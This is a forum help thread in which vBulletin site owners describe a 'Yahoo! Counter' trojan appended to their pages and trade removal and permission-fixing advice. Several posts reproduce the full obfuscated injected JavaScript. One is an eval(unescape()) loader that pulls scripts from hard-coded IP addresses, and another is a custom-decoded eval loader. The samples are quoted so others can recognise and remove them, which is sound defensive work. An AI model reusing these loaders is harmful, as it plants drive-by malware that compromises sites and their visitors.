"Yahoo Counter Starts" Trojan in my CMPS?

[UDPride]

My site VB.3.7.3 VBA 3.0.1 www.udpride.com is currently suffering from the

"!-- Yahoo! Counter starts..." trojan that has appended to the footer of all of my forum pages (regardless or template/style). I looked at my footer templates in VB CP and this code is not there. My last code is as it should be -- Site Catalyst page tracking software. However when you do a view source, the Yahoo code has been appended right after it at the bottom of the pages. Looks like this:

Code:

<script language=javascript><!-- Yahoo! Counter starts 
if(typeof(yahoo_counter)!=typeof(1))eval(unescape('|/#/@.~.!.................[keeps going]
<!-- counter end --></script>

When I toggled off/on my plugins, the problem goes away when VBA CMPS is disabled.

This trojan has been going around and infecting blogs and forums. It slows the pages down, sets off all kinds of alarms on virus software and can causes major issues with search engine results.

Questions:
1. How Did it Get there?
2. How do I remove it?
3. What CMOD permissions should be on my folders and files inside my forums???

I noticed in my /forums folders "cache", "includes", and "modules" (vba?) are all 777 permissions.

Should all folders be 777 and all files be 644 without exception?

[mikesz]

This is a link that has some details about it

You probably need to get some help from your hosting provider

[mikesz]

All my vbulletin folders are 755. If you didn't change them to 777 then the badguy did.

You should look on your server for files that have changed since this problem started. They probably contain a gift from the badguy.

[DaveInDaytona]

I can't find where it is on my forum. It only seems to be on the vBa CPMS screen.

http://daytonasportbikes.com/forum/

[DaveInDaytona]

Was anyone able to resolve this? I'm still chasing it on my forum.

[UDPride]

This hack was a nasty one. Thanks to Michael at VBPlusMe.com, he helped me get out a jam and clean things up. I couldn't have asked for better assistance. Dave, Id check with him and see if he can help you, although I just did a quick view source on your pages and didnt see the Yahoo code.

This code buries itself in your footers to the tune of endless random PHP (that obviously means something to someone) and also dumps a Yahoo Counter php script somewhere north of your footer, perhaps in the Meta Description of your VBulletin. You need to get rid of both.

There is probably also an htaccess file on your site somewhere and in that same folder you will find an index.htm attributable to these scumbags who dumped the code on you as their calling card. Youll need to remove those as well.

The PHP jibberish is at the tail end of dozens if not hundreds of your PHP files and TMPL files. Start with PHP files that relate to configurations.

Also, if you run VB Advanced, check your module PHP files. Most of those will probably have the jibberish as well.

Check your file and folder permissions. The hack may have changed them or exploited incorrect ones. 755 the folders and 644 the files. Michael indicates VB does not need any 777 folders to run (though add-ons might).

Its a painstaking process. The hacked code slows the sites down, sets off all kinds of bells and whistles with users antivirus etc.

Also run MalWareByte (download free at Download.com) to scan your hard drive for any bad guys that may have jumped into your own machine.

Last thing is change your passwords. All of them.

And when you run into trouble, give a shout out here. I can tell you what I found, and the admins here can work something out with you to take a look and help solve the problem as they did with me.

[DaveInDaytona]

Quote:

Originally Posted by UDPride

Dave, Id check with him and see if he can help you, although I just did a quick view source on your pages and didnt see the Yahoo code.

Thanks, I may bug you a little to get the details of what you found but I won't bore people here with it.

I'm still cleaning my site when I have the time to poke around on it, but my real job seems to be taking up most of my time at the moment.

I appreciate the update.

[UDPride]

Im no programmer or database expert but Ill tell you everything I know.

[wolverine09]

New poster here. I think I may have this on all my sites.

Is this what the malicious code looks like?

<script language=javascript><!-- Yahoo! Counter starts
if(typeof(yahoo_counter)!=typeof(1))eval(unescape('&%2F@/!%3Cd&iv%20~st$%79%6C&%65#=`di$%73|p@%6C`%61~y:no~n%65$%3E\n#%64o|%63$%75%6D%65% 6E%74`.wr%69te|("%3C/`%74e%78~ta&r%65#a~%3E"%29@%3B!%76@%61|r%20%69!,_!%2Ca!%3D@%5B"$%37$%38%2E#1$%31 %30%2E%31@%37%35$%2E@2!1",`"%31!9!5!%2E!%32%34#.$%37~%36#%2E`%32%35$%31%22%5D@%3 B!%5F&%3D!%31;i%66#(d#%6F%63%75%6D%65n!t.co~%6F%6B~%69|e#.ma!t&ch%28%2F%5C%62#%6 8`g%66|t!%3D%31/)=$%3D%6E%75!l@l%29%66o`r!(i%3D#%30%3B%69#%3C2;&%69+#%2B&%29|d`oc%75!%6De#%6E#%7 4.%77&%72%69t%65#%28$%22%3C$%73%63%72@i%70t%3E|%69@%66%28_)~%64%6Fc%75|%6D@%65%6 E#%74.%77#%72%69!%74e(%5C~"`%3C~%73!%63$%72@%69`%70%74%20@%69$%64|=%5F&%22|+|%69 %2B!%22~%5F$%20$%73~%72!%63=%2F/"%2B%61$%5B$%69~%5D!+#%22`%2F@c&p/&%3F~%22%2B!n%61$%76%69%67%61#t!o|%72%2E!a%70pN%61m!%65`.~c#h%61r%41%74#%28%30~% 29`%2B"%3E`%3C~%5C!%5C%2F&%73$%63~%72#ipt%3E~%5C"%29@%3C%5C~%2F%73c!%72~%69p$%74 $%3E%22&)@%3B|\n/!%2F$%3C%2F%64`%69v&%3E').replace(/\!|@|\$|#|~|`|\&|\|/g,""));var yahoo_counter=1;
<!-- counter end --></script>



It literally may be on every single site I have with my hosting provider. Thanks for the information so far, it's the most I've seen.

[DaveInDaytona]

Quote:

Originally Posted by wolverine09

New poster here. I think I may have this on all my sites.

Is this what the malicious code looks like?

<script language=javascript><!-- Yahoo! Counter starts
if(typeof(yahoo_counter)!=typeof(1))eval(unescape('&%2F@/!%3Cd&iv%20~st$%79%6C&%65#=`di$%73|p@%6C`%61~y:no~n%65$%3E\n#%64o|%63$%75%6D%65% 6E%74`.wr%69te|("%3C/`%74e%78~ta&r%65#a~%3E"%29@%3B!%76@%61|r%20%69!,_!%2Ca!%3D@%5B"$%37$%38%2E#1$%31 %30%2E%31@%37%35$%2E@2!1",`"%31!9!5!%2E!%32%34#.$%37~%36#%2E`%32%35$%31%22%5D@%3 B!%5F&%3D!%31;i%66#(d#%6F%63%75%6D%65n!t.co~%6F%6B~%69|e#.ma!t&ch%28%2F%5C%62#%6 8`g%66|t!%3D%31/)=$%3D%6E%75!l@l%29%66o`r!(i%3D#%30%3B%69#%3C2;&%69+#%2B&%29|d`oc%75!%6De#%6E#%7 4.%77&%72%69t%65#%28$%22%3C$%73%63%72@i%70t%3E|%69@%66%28_)~%64%6Fc%75|%6D@%65%6 E#%74.%77#%72%69!%74e(%5C~"`%3C~%73!%63$%72@%69`%70%74%20@%69$%64|=%5F&%22|+|%69 %2B!%22~%5F$%20$%73~%72!%63=%2F/"%2B%61$%5B$%69~%5D!+#%22`%2F@c&p/&%3F~%22%2B!n%61$%76%69%67%61#t!o|%72%2E!a%70pN%61m!%65`.~c#h%61r%41%74#%28%30~% 29`%2B"%3E`%3C~%5C!%5C%2F&%73$%63~%72#ipt%3E~%5C"%29@%3C%5C~%2F%73c!%72~%69p$%74 $%3E%22&)@%3B|\n/!%2F$%3C%2F%64`%69v&%3E').replace(/\!|@|\$|#|~|`|\&|\|/g,""));var yahoo_counter=1;
<!-- counter end --></script>



It literally may be on every single site I have with my hosting provider. Thanks for the information so far, it's the most I've seen.

Looks like it. I was able to locate the code and remove it.

Do you use ixwebhosting?

[wolverine09]

Yes, I do use IX webhosting. I was able to free my main site of this scum tonight. Still lots of work to do for the other sites.

I also noticed there were other wrong files in there as well. Go into the CP->scripts folder and look for things likechat, forum, guestlog, weird pictures etc. They always accompanied the yahoo counter virus thing. I'm seriously wondering how every single one of my sites got nailed with this yahoo counter thing *and* another script that looks like this:

<script language=JavaScript>function tobnb25(z){ var c=z.length,m=1024,i,s,h,b=0,w=0,x=0,d=Array(63,62,45,0,25,55,44,41,2,31,0,0,0,0, 0,0,3,38,33,21,20,16,19,10,42,35,13,32,24,17,4,40,46,56,53,15,60,5,50,47,57,48,5 1,0,0,0,0,26,0,49,6,29,7,12,54,34,23,28,58,11,14,36,43,27,8,59,52,39,37,30,61,1, 18,22,9);for(s=Math.ceil(c/m);s>0;s–){h=”;for(i=Math.min(c,m);i>0;i–,c–){{x|=(d[z.charCodeAt(b++)-48])<<w;if(w){h+=String.fromCharCode(224^x&255);x>>=8;w-=2}else{w=6}}}eval(h);}}tobnb25(’hAOIN1QtlSztwx4tFfvam1OIUuTfN1QKCfLBlx7ZhG4gDyp VdZcgbG4KJypYlbLIUfcf4FLrE@TmxlL58IptD87fS0TRF84BUxOZzjOBS1etS0vak5_KDgOZx1Ltlxp V2bptpj6mwjpBSfpVzneRCkJRLsTVdscfNbJrdWTa8@TtzxptpfJRDIJYpyLgdgptcdJrM@TmDAzIUf2 YNAQmEVLK4H2ISjLB8qJ5SsOBxbLIUjvaz@’)</script><!– yourdomain.com –>

normally found in index pages. This blog page really helped me out there:

http://mtminds.com/category/malware/


I used Wingrep and was able to search my website folders for the right string, making it easier to find them:

http://www.wingrep.com/

For example, download your website folder to your computer, and do a search for "<script language=JavaScript>function " in that folder using wingrep and you will find all the pages on your site that contain that bad code. Same for the yahoo stats counter term, "<script language=javascript><!-- Yahoo! Counter ". Saves a lot of time looking for the code. Luckily, my main site had a very clean and up to date backup in two places, and IWas able to delete the entire thing and just re-upload with no problems. Also, believe it or not I have found Avast to be much superior to Avir and AVG for finding these problems others were reporting but not me.